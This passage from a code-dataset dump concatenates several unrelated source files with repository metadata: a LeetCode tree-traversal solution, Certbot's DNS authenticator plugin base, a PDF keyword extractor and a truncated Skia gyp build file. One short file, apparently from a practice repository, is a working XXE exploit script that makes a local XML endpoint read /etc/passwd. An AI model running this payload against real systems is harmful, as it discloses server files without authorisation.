"WindowsMailslotObjectType"
]
| false
| true
|
f71905580a519f932cc674741f730cc9139a87df
| 833
|
py
|
Python
|
Dataset/Leetcode/valid/102/204.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
Dataset/Leetcode/valid/102/204.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
Dataset/Leetcode/valid/102/204.py
|
kkcookies99/UAST
|
fff81885aa07901786141a71e5600a08d7cb4868
|
[
"MIT"
] | null | null | null |
class Solution:
def XXX(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
#思想就是使用队列辅助,首先根节点入队,然后开始循环,当队列不为空,不停的出队并将出队节点的左右节点入队
res=[]
q=[root]
count1,count2=1,0
#主要问题就是这个输出格式有点脑瘫,非得一层一起输出,所以这里定义两个变量count1,count2,为什么定两个,可以理解成一个用来统计下一层有多少节点,一个用来在输出这一层的时候遍历,这一层输出完要进入下一层的时候更新一下变量值
while q:
temp=[] #临时数组,用来储存这一层的所有节点
for _ in range(count1): #遍历这一层的所有节点
p=q.pop(0)
temp.append(p.val)
if p.left:
q.append(p.left)
count2+=1 #统计下一层的节点数
if p.right:
q.append(p.right)
count2+=1 #统计下一层的节点数
res.append(temp)
count1,count2=count2,0 #进入下一层,更新变量值
return res
| 33.32
| 124
| 0.521008
|
class Solution:
def XXX(self, root: TreeNode) -> List[List[int]]:
if not root:
return []
res=[]
q=[root]
count1,count2=1,0
while q:
temp=[]
for _ in range(count1):
p=q.pop(0)
temp.append(p.val)
if p.left:
q.append(p.left)
count2+=1
if p.right:
q.append(p.right)
count2+=1
res.append(temp)
count1,count2=count2,0
return res
| true
| true
|
f719056e15b29ef4606019d3603298ad5627461c
| 314
|
py
|
Python
|
exploits/xml_exploit.py
|
denny00786/CASoftwareDevelopment
|
d03c82b6bb033a39b4270115ec464eca773e0814
|
[
"Apache-2.0"
] | 1
|
2020-04-02T00:29:16.000Z
|
2020-04-02T00:29:16.000Z
|
exploits/xml_exploit.py
|
denny00786/CASoftwareDevelopment
|
d03c82b6bb033a39b4270115ec464eca773e0814
|
[
"Apache-2.0"
] | null | null | null |
exploits/xml_exploit.py
|
denny00786/CASoftwareDevelopment
|
d03c82b6bb033a39b4270115ec464eca773e0814
|
[
"Apache-2.0"
] | 4
|
2021-04-01T21:31:01.000Z
|
2022-03-23T08:22:44.000Z
|
import requests
url = 'http://localhost/xml'
shellcode = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
'''
data = {'input_data': shellcode}
response = requests.post(url, data=data)
print(response.text)
| 15.7
| 58
| 0.640127
|
import requests
url = 'http://localhost/xml'
shellcode = '''<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM
"file:///etc/passwd">
]>
<foo>
&xxe;
</foo>
'''
data = {'input_data': shellcode}
response = requests.post(url, data=data)
print(response.text)
| true
| true
|
f71905d79157038348e3b499a02d4481fdbe417c
| 11,471
|
py
|
Python
|
certbot/plugins/dns_common.py
|
aaroncohen/certbot
|
c3434bac26592585d12feb781a87f3e2be846e42
|
[
"Apache-2.0"
] | 1
|
2018-09-12T03:07:11.000Z
|
2018-09-12T03:07:11.000Z
|
certbot/plugins/dns_common.py
|
978740431/certbot
|
c3434bac26592585d12feb781a87f3e2be846e42
|
[
"Apache-2.0"
] | null | null | null |
certbot/plugins/dns_common.py
|
978740431/certbot
|
c3434bac26592585d12feb781a87f3e2be846e42
|
[
"Apache-2.0"
] | null | null | null |
"""Common code for DNS Authenticator Plugins."""
import abc
import logging
import os
import stat
from time import sleep
import configobj
import zope.interface
from acme import challenges
from certbot import errors
from certbot import interfaces
from certbot.display import ops
from certbot.display import util as display_util
from certbot.plugins import common
logger = logging.getLogger(__name__)
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class DNSAuthenticator(common.Plugin):
"""Base class for DNS Authenticators"""
def __init__(self, config, name):
super(DNSAuthenticator, self).__init__(config, name)
self._attempt_cleanup = False
@classmethod
def add_parser_arguments(cls, add, default_propagation_seconds=10): # pylint: disable=arguments-differ
add('propagation-seconds',
default=default_propagation_seconds,
type=int,
help='The number of seconds to wait for DNS to propagate before asking the ACME server '
'to verify the DNS record.')
def get_chall_pref(self, unused_domain): # pylint: disable=missing-docstring,no-self-use
return [challenges.DNS01]
def prepare(self): # pylint: disable=missing-docstring
pass
def perform(self, achalls): # pylint: disable=missing-docstring
self._setup_credentials()
self._attempt_cleanup = True
responses = []
for achall in achalls:
domain = achall.domain
validation_domain_name = achall.validation_domain_name(domain)
validation = achall.validation(achall.account_key)
self._perform(domain, validation_domain_name, validation)
responses.append(achall.response(achall.account_key))
# DNS updates take time to propagate and checking to see if the update has occurred is not
# reliable (the machine this code is running on might be able to see an update before
# the ACME server). So: we sleep for a short amount of time we believe to be long enough.
logger.info("Waiting %d seconds for DNS changes to propagate",
self.conf('propagation-seconds'))
sleep(self.conf('propagation-seconds'))
return responses
def cleanup(self, achalls): # pylint: disable=missing-docstring
if self._attempt_cleanup:
for achall in achalls:
domain = achall.domain
validation_domain_name = achall.validation_domain_name(domain)
validation = achall.validation(achall.account_key)
self._cleanup(domain, validation_domain_name, validation)
@abc.abstractmethod
def _setup_credentials(self): # pragma: no cover
"""
Establish credentials, prompting if necessary.
"""
raise NotImplementedError()
@abc.abstractmethod
def _perform(self, domain, validation_domain_name, validation): # pragma: no cover
"""
Performs a dns-01 challenge by creating a DNS TXT record.
:param str domain: The domain being validated.
:param str validation_domain_name: The validation record domain name.
:param str validation: The validation record content.
:raises errors.PluginError: If the challenge cannot be performed
"""
raise NotImplementedError()
@abc.abstractmethod
def _cleanup(self, domain, validation_domain_name, validation): # pragma: no cover
"""
Deletes the DNS TXT record which would have been created by `_perform_achall`.
Fails gracefully if no such record exists.
:param str domain: The domain being validated.
:param str validation_domain_name: The validation record domain name.
:param str validation: The validation record content.
"""
raise NotImplementedError()
def _configure(self, key, label):
"""
Ensure that a configuration value is available.
If necessary, prompts the user and stores the result.
:param str key: The configuration key.
:param str label: The user-friendly label for this piece of information.
"""
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_data(label)
setattr(self.config, self.dest(key), new_value)
def _configure_file(self, key, label, validator=None):
"""
Ensure that a configuration value is available for a path.
If necessary, prompts the user and stores the result.
:param str key: The configuration key.
:param str label: The user-friendly label for this piece of information.
"""
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_file(label, validator)
setattr(self.config, self.dest(key), os.path.abspath(os.path.expanduser(new_value)))
def _configure_credentials(self, key, label, required_variables=None):
"""
As `_configure_file`, but for a credential configuration file.
If necessary, prompts the user and stores the result.
Always stores absolute paths to avoid issues during renewal.
:param str key: The configuration key.
:param str label: The user-friendly label for this piece of information.
:param dict required_variables: Map of variable which must be present to error to display.
"""
def __validator(filename):
if required_variables:
CredentialsConfiguration(filename, self.dest).require(required_variables)
self._configure_file(key, label, __validator)
credentials_configuration = CredentialsConfiguration(self.conf(key), self.dest)
if required_variables:
credentials_configuration.require(required_variables)
return credentials_configuration
@staticmethod
def _prompt_for_data(label):
"""
Prompt the user for a piece of information.
:param str label: The user-friendly label for this piece of information.
:returns: The user's response (guaranteed non-empty).
:rtype: str
"""
def __validator(i):
if not i:
raise errors.PluginError('Please enter your {0}.'.format(label))
code, response = ops.validated_input(
__validator,
'Input your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
@staticmethod
def _prompt_for_file(label, validator=None):
"""
Prompt the user for a path.
:param str label: The user-friendly label for the file.
:param callable validator: A method which will be called to validate the supplied input
after it has been validated to be a non-empty path to an existing file. Should throw a
`~certbot.errors.PluginError` to indicate any issue.
:returns: The user's response (guaranteed to exist).
:rtype: str
"""
def __validator(filename):
if not filename:
raise errors.PluginError('Please enter a valid path to your {0}.'.format(label))
filename = os.path.expanduser(filename)
validate_file(filename)
if validator:
validator(filename)
code, response = ops.validated_directory(
__validator,
'Input the path to your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
class CredentialsConfiguration(object):
"""Represents a user-supplied filed which stores API credentials."""
def __init__(self, filename, mapper=lambda x: x):
"""
:param str filename: A path to the configuration file.
:param callable mapper: A transformation to apply to configuration key names
:raises errors.PluginError: If the file does not exist or is not a valid format.
"""
validate_file_permissions(filename)
try:
self.confobj = configobj.ConfigObj(filename)
except configobj.ConfigObjError as e:
logger.debug("Error parsing credentials configuration: %s", e, exc_info=True)
raise errors.PluginError("Error parsing credentials configuration: {0}".format(e))
self.mapper = mapper
def require(self, required_variables):
"""Ensures that the supplied set of variables are all present in the file.
:param dict required_variables: Map of variable which must be present to error to display.
:raises errors.PluginError: If one or more are missing.
"""
messages = []
for var in required_variables:
if not self._has(var):
messages.append('Property "{0}" not found (should be {1}).'
.format(self.mapper(var), required_variables[var]))
elif not self._get(var):
messages.append('Property "{0}" not set (should be {1}).'
.format(self.mapper(var), required_variables[var]))
if messages:
raise errors.PluginError(
'Missing {0} in credentials configuration file {1}:\n * {2}'.format(
'property' if len(messages) == 1 else 'properties',
self.confobj.filename,
'\n * '.join(messages)
)
)
def conf(self, var):
"""Find a configuration value for variable `var`, as transformed by `mapper`.
:param str var: The variable to get.
:returns: The value of the variable.
:rtype: str
"""
return self._get(var)
def _has(self, var):
return self.mapper(var) in self.confobj
def _get(self, var):
return self.confobj.get(self.mapper(var))
def validate_file(filename):
"""Ensure that the specified file exists."""
if not os.path.exists(filename):
raise errors.PluginError('File not found: {0}'.format(filename))
if not os.path.isfile(filename):
raise errors.PluginError('Path is not a file: {0}'.format(filename))
def validate_file_permissions(filename):
"""Ensure that the specified file exists and warn about unsafe permissions."""
validate_file(filename)
permissions = stat.S_IMODE(os.stat(filename).st_mode)
if permissions & stat.S_IRWXO:
logger.warning('Unsafe permissions on credentials configuration file: %s', filename)
def base_domain_name_guesses(domain):
"""Return a list of progressively less-specific domain names.
One of these will probably be the domain name known to the DNS provider.
:Example:
>>> base_domain_name_guesses('foo.bar.baz.example.com')
['foo.bar.baz.example.com', 'bar.baz.example.com', 'baz.example.com', 'example.com', 'com']
:param str domain: The domain for which to return guesses.
:returns: The a list of less specific domain names.
:rtype: list
"""
fragments = domain.split('.')
return ['.'.join(fragments[i:]) for i in range(0, len(fragments))]
| 35.404321
| 107
| 0.648418
|
import abc
import logging
import os
import stat
from time import sleep
import configobj
import zope.interface
from acme import challenges
from certbot import errors
from certbot import interfaces
from certbot.display import ops
from certbot.display import util as display_util
from certbot.plugins import common
logger = logging.getLogger(__name__)
@zope.interface.implementer(interfaces.IAuthenticator)
@zope.interface.provider(interfaces.IPluginFactory)
class DNSAuthenticator(common.Plugin):
def __init__(self, config, name):
super(DNSAuthenticator, self).__init__(config, name)
self._attempt_cleanup = False
@classmethod
def add_parser_arguments(cls, add, default_propagation_seconds=10):
add('propagation-seconds',
default=default_propagation_seconds,
type=int,
help='The number of seconds to wait for DNS to propagate before asking the ACME server '
'to verify the DNS record.')
def get_chall_pref(self, unused_domain):
return [challenges.DNS01]
def prepare(self):
pass
def perform(self, achalls):
self._setup_credentials()
self._attempt_cleanup = True
responses = []
for achall in achalls:
domain = achall.domain
validation_domain_name = achall.validation_domain_name(domain)
validation = achall.validation(achall.account_key)
self._perform(domain, validation_domain_name, validation)
responses.append(achall.response(achall.account_key))
logger.info("Waiting %d seconds for DNS changes to propagate",
self.conf('propagation-seconds'))
sleep(self.conf('propagation-seconds'))
return responses
def cleanup(self, achalls):
if self._attempt_cleanup:
for achall in achalls:
domain = achall.domain
validation_domain_name = achall.validation_domain_name(domain)
validation = achall.validation(achall.account_key)
self._cleanup(domain, validation_domain_name, validation)
@abc.abstractmethod
def _setup_credentials(self):
raise NotImplementedError()
@abc.abstractmethod
def _perform(self, domain, validation_domain_name, validation):
raise NotImplementedError()
@abc.abstractmethod
def _cleanup(self, domain, validation_domain_name, validation):
raise NotImplementedError()
def _configure(self, key, label):
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_data(label)
setattr(self.config, self.dest(key), new_value)
def _configure_file(self, key, label, validator=None):
configured_value = self.conf(key)
if not configured_value:
new_value = self._prompt_for_file(label, validator)
setattr(self.config, self.dest(key), os.path.abspath(os.path.expanduser(new_value)))
def _configure_credentials(self, key, label, required_variables=None):
def __validator(filename):
if required_variables:
CredentialsConfiguration(filename, self.dest).require(required_variables)
self._configure_file(key, label, __validator)
credentials_configuration = CredentialsConfiguration(self.conf(key), self.dest)
if required_variables:
credentials_configuration.require(required_variables)
return credentials_configuration
@staticmethod
def _prompt_for_data(label):
def __validator(i):
if not i:
raise errors.PluginError('Please enter your {0}.'.format(label))
code, response = ops.validated_input(
__validator,
'Input your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
@staticmethod
def _prompt_for_file(label, validator=None):
def __validator(filename):
if not filename:
raise errors.PluginError('Please enter a valid path to your {0}.'.format(label))
filename = os.path.expanduser(filename)
validate_file(filename)
if validator:
validator(filename)
code, response = ops.validated_directory(
__validator,
'Input the path to your {0}'.format(label),
force_interactive=True)
if code == display_util.OK:
return response
else:
raise errors.PluginError('{0} required to proceed.'.format(label))
class CredentialsConfiguration(object):
def __init__(self, filename, mapper=lambda x: x):
validate_file_permissions(filename)
try:
self.confobj = configobj.ConfigObj(filename)
except configobj.ConfigObjError as e:
logger.debug("Error parsing credentials configuration: %s", e, exc_info=True)
raise errors.PluginError("Error parsing credentials configuration: {0}".format(e))
self.mapper = mapper
def require(self, required_variables):
messages = []
for var in required_variables:
if not self._has(var):
messages.append('Property "{0}" not found (should be {1}).'
.format(self.mapper(var), required_variables[var]))
elif not self._get(var):
messages.append('Property "{0}" not set (should be {1}).'
.format(self.mapper(var), required_variables[var]))
if messages:
raise errors.PluginError(
'Missing {0} in credentials configuration file {1}:\n * {2}'.format(
'property' if len(messages) == 1 else 'properties',
self.confobj.filename,
'\n * '.join(messages)
)
)
def conf(self, var):
return self._get(var)
def _has(self, var):
return self.mapper(var) in self.confobj
def _get(self, var):
return self.confobj.get(self.mapper(var))
def validate_file(filename):
if not os.path.exists(filename):
raise errors.PluginError('File not found: {0}'.format(filename))
if not os.path.isfile(filename):
raise errors.PluginError('Path is not a file: {0}'.format(filename))
def validate_file_permissions(filename):
validate_file(filename)
permissions = stat.S_IMODE(os.stat(filename).st_mode)
if permissions & stat.S_IRWXO:
logger.warning('Unsafe permissions on credentials configuration file: %s', filename)
def base_domain_name_guesses(domain):
fragments = domain.split('.')
return ['.'.join(fragments[i:]) for i in range(0, len(fragments))]
| true
| true
|
f7190714a40b489705d1a2f0f757254156b06f7f
| 1,247
|
py
|
Python
|
crawler/pdf.py
|
mental689/paddict
|
493268b62531c698687d42416edf61c602250133
|
[
"MIT"
] | 1
|
2019-06-22T10:28:21.000Z
|
2019-06-22T10:28:21.000Z
|
crawler/pdf.py
|
mental689/paddict
|
493268b62531c698687d42416edf61c602250133
|
[
"MIT"
] | 4
|
2020-09-05T01:48:18.000Z
|
2022-03-02T04:29:25.000Z
|
crawler/pdf.py
|
mental689/paddict
|
493268b62531c698687d42416edf61c602250133
|
[
"MIT"
] | null | null | null |
#import PyPDF2 # PyPDF2 extracts texts from PDF markup. We found that it worked relatively poor with CVPR papers. Spaces between words are often omitted in the outputs.
import textract # textract uses external OCR command "tesseract" to extract texts. The workflow is to first convert pdf files to ppm images and then apply OCR to extract texts.
from nltk.tokenize import word_tokenize
import os, re
import django
django.setup()
from papers.settings import BASE_DIR
import xml.etree.ElementTree as ET
def get_stopwords():
with open("{}/static/stopwords.txt".format(BASE_DIR)) as f:
stopwords = [w.strip() for w in f.readlines()]
return stopwords
STOPWORDS = get_stopwords()
def extract_keywords_from_pdf(pdf_file):
text = str(textract.process(pdf_file, method='tesseract', language='eng', layout="layout"))
tokens = word_tokenize(text)
tokens =[tk.strip() for tk in tokens]
tokens =[tk.replace('-\\n','') for tk in tokens]
words = [w for w in tokens if w not in STOPWORDS]
words = [re.sub('[^0-9a-zA-Z]+','',w).lower() for w in words]
words = [w for w in words if len(w) > 2]
return words
def parse_cermine_output(cermine_file):
tree = ET.parse(cermine_file)
root = tree.getroot()
| 34.638889
| 176
| 0.715317
|
ee.ElementTree as ET
def get_stopwords():
with open("{}/static/stopwords.txt".format(BASE_DIR)) as f:
stopwords = [w.strip() for w in f.readlines()]
return stopwords
STOPWORDS = get_stopwords()
def extract_keywords_from_pdf(pdf_file):
text = str(textract.process(pdf_file, method='tesseract', language='eng', layout="layout"))
tokens = word_tokenize(text)
tokens =[tk.strip() for tk in tokens]
tokens =[tk.replace('-\\n','') for tk in tokens]
words = [w for w in tokens if w not in STOPWORDS]
words = [re.sub('[^0-9a-zA-Z]+','',w).lower() for w in words]
words = [w for w in words if len(w) > 2]
return words
def parse_cermine_output(cermine_file):
tree = ET.parse(cermine_file)
root = tree.getroot()
| true
| true
|
f71907581411d3f59e6caa7fc154349051e25a21
| 11,381
|
gyp
|
Python
|
skia/skia_library_opts.gyp
|
shaochangbin/chromium-crosswalk
|
634d34e4cf82b4f7400357c53ec12efaffe94add
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 2
|
2019-01-16T03:57:28.000Z
|
2021-01-23T15:29:45.000Z
|
skia/skia_library_opts.gyp
|
shaochangbin/chromium-crosswalk
|
634d34e4cf82b4f7400357c53ec12efaffe94add
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | null | null | null |
skia/skia_library_opts.gyp
|
shaochangbin/chromium-crosswalk
|
634d34e4cf82b4f7400357c53ec12efaffe94add
|
[
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1
|
2017-03-15T13:21:38.000Z
|
2017-03-15T13:21:38.000Z
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# This gyp file contains the platform-specific optimizations for Skia
{
'targets': [
# Due to an unfortunate intersection of lameness between gcc and gyp,
# we have to build the *_SSE2.cpp files in a separate target. The
# gcc lameness is that, in order to compile SSE2 intrinsics code, it
# must be passed the -msse2 flag. However, with this flag, it may
# emit SSE2 instructions even for scalar code, such as the CPUID
# test used to test for the presence of SSE2. So that, and all other
# code must be compiled *without* -msse2. The gyp lameness is that it
# does not allow file-specific CFLAGS, so we must create this extra
# target for those files to be compiled with -msse2.
#
# This is actually only a problem on 32-bit Linux (all Intel Macs have
# SSE2, Linux x86_64 has SSE2 by definition, and MSC will happily emit
# SSE2 from instrinsics, which generating plain ol' 386 for everything
# else). However, to keep the .gyp file simple and avoid platform-specific
# build breakage, we do this on all platforms.
# For about the same reason, we need to compile the ARM opts files
# separately as well.
{
'target_name': 'skia_opts',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'conditions': [
[ 'os_posix == 1 and OS != "mac" and OS != "android" and \
target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'cflags': [
'-msse2',
],
}],
[ 'target_arch != "arm" and target_arch != "mipsel" and \
target_arch != "arm64"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRect_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkUtils_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkBitmapFilter_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_SSE2.cpp',
],
'dependencies': [
'skia_opts_ssse3',
],
}],
# TODO(rmcilroy): Add neon support for arm64 - http://crbug.com/354405
[ 'target_arch == "arm"', {
'conditions': [
[ 'arm_version >= 7 and arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
[ 'arm_version >= 7 and arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
[ 'arm_version >= 7 and (arm_neon == 1 or arm_neon_optional == 1)', {
'cflags': [
# The neon assembly contains conditional instructions which
# aren't enclosed in an IT block. The assembler complains
# without this option.
# See #86592.
'-Wa,-mimplicit-it=always',
],
'dependencies': [
'skia_opts_neon',
]
}],
],
# The assembly uses the frame pointer register (r7 in Thumb/r11 in
# ARM), the compiler doesn't like that. Explicitly remove the
# -fno-omit-frame-pointer flag for Android, as that gets added to all
# targets via common.gypi.
'cflags!': [
'-fno-omit-frame-pointer',
'-marm',
'-mapcs-frame',
],
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_arm.cpp',
],
}],
[ 'target_arch == "arm" and (arm_version < 7 or (arm_neon == 0 and arm_neon_optional == 1))', {
'sources': [
'../third_party/skia/src/opts/memset.arm.S',
],
}],
[ 'target_arch == "arm" and arm_version < 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm" and arm_version >= 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm.h',
'../third_party/skia/src/opts/SkBlurImage_opts_arm.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_arm.cpp',
'../third_party/skia/src/opts/SkUtils_opts_arm.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
],
}],
[ 'target_arch == "mipsel"',{
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
[ 'target_arch == "arm64"',{
# TODO(rmcilroy): Update this once http://crrev.com/143423004/ lands.
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
}],
],
},
# For the same lame reasons as what is done for skia_opts, we have to
# create another target specifically for SSSE3 code as we would not want
# to compile the SSE2 code with -mssse3 which would potentially allow
# gcc to generate SSSE3 code.
{
'target_name': 'skia_opts_ssse3',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'conditions': [
[ 'OS in ["linux", "freebsd", "openbsd", "solaris", "android"]', {
'cflags': [
'-mssse3',
],
}],
[ 'OS == "mac"', {
'xcode_settings': {
'GCC_ENABLE_SUPPLEMENTAL_SSE3_INSTRUCTIONS': 'YES',
},
}],
[ 'OS == "win"', {
'include_dirs': [
'config/win',
],
'direct_dependent_settings': {
'include_dirs': [
'config/win',
],
},
}],
[ 'target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSSE3.cpp',
],
}],
],
},
{
'target_name': 'skia_opts_none',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_none.cpp',
],
},
],
'conditions': [
# NEON code must be compiled with -mfpu=neon which also affects scalar
# code. To support dynamic NEON code paths, we need to build all
# NEON-specific sources in a separate static library. The situation
# is very similar to the SSSE3 one.
['target_arch == "arm" and (arm_neon == 1 or arm_neon_optional == 1)', {
'targets': [
{
'target_name': 'skia_opts_neon',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'cflags!': [
'-fno-omit-frame-pointer',
'-mfpu=vfp', # remove them all, just in case.
'-mfpu=vfpv3',
'-mfpu=vfpv3-d16',
],
'cflags': [
'-mfpu=neon',
'-fomit-frame-pointer',
],
'ldflags': [
'-march=armv7-a',
'-Wl,--fix-cortex-a8',
],
'sources': [
'../third_party/skia/src/opts/memset16_neon.S',
'../third_party/skia/src/opts/memset32_neon.S',
'../third_party/skia/src/opts/SkBitmapProcState_arm_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrixProcs_neon.cpp',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_clamp_neon.h',
'../third_party/skia/src/opts/SkBitmapProcState_matrix_repeat_neon.h',
'../third_party/skia/src/opts/SkBlitMask_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_arm_neon.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_neon.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_neon.cpp',
],
'conditions': [
['arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
['arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
],
},
],
}],
],
}
| 39.517361
| 103
| 0.549864
|
{
'targets': [
# else). However, to keep the .gyp file simple and avoid platform-specific
# build breakage, we do this on all platforms.
# For about the same reason, we need to compile the ARM opts files
# separately as well.
{
'target_name': 'skia_opts',
'type': 'static_library',
'includes': [
'skia_common.gypi',
],
'include_dirs': [
'../third_party/skia/include/core',
'../third_party/skia/include/effects',
'../third_party/skia/src/core',
'../third_party/skia/src/opts',
],
'conditions': [
[ 'os_posix == 1 and OS != "mac" and OS != "android" and \
target_arch != "arm" and target_arch != "arm64" and \
target_arch != "mipsel"', {
'cflags': [
'-msse2',
],
}],
[ 'target_arch != "arm" and target_arch != "mipsel" and \
target_arch != "arm64"', {
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRect_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkUtils_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkBitmapFilter_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_SSE2.cpp',
'../third_party/skia/src/opts/SkBlurImage_opts_SSE2.cpp',
],
'dependencies': [
'skia_opts_ssse3',
],
}],
# TODO(rmcilroy): Add neon support for arm64 - http://crbug.com/354405
[ 'target_arch == "arm"', {
'conditions': [
[ 'arm_version >= 7 and arm_neon == 1', {
'defines': [
'__ARM_HAVE_NEON',
],
}],
[ 'arm_version >= 7 and arm_neon_optional == 1', {
'defines': [
'__ARM_HAVE_OPTIONAL_NEON_SUPPORT',
],
}],
[ 'arm_version >= 7 and (arm_neon == 1 or arm_neon_optional == 1)', {
'cflags': [
# The neon assembly contains conditional instructions which
# aren't enclosed in an IT block. The assembler complains
'-Wa,-mimplicit-it=always',
],
'dependencies': [
'skia_opts_neon',
]
}],
],
# -fno-omit-frame-pointer flag for Android, as that gets added to all
# targets via common.gypi.
'cflags!': [
'-fno-omit-frame-pointer',
'-marm',
'-mapcs-frame',
],
'cflags': [
'-fomit-frame-pointer',
],
'sources': [
'../third_party/skia/src/opts/SkBitmapProcState_opts_arm.cpp',
],
}],
[ 'target_arch == "arm" and (arm_version < 7 or (arm_neon == 0 and arm_neon_optional == 1))', {
'sources': [
'../third_party/skia/src/opts/memset.arm.S',
],
}],
[ 'target_arch == "arm" and arm_version < 6', {
'sources': [
'../third_party/skia/src/opts/SkBlitMask_opts_none.cpp',
'../third_party/skia/src/opts/SkBlitRow_opts_none.cpp',
'../third_party/skia/src/opts/SkUtils_opts_none.cpp',
'../third_party/skia/src/opts/SkXfermode_opts_none.cpp',
'../third_party/skia/src/opts/SkMorphology_opts_none.cpp',
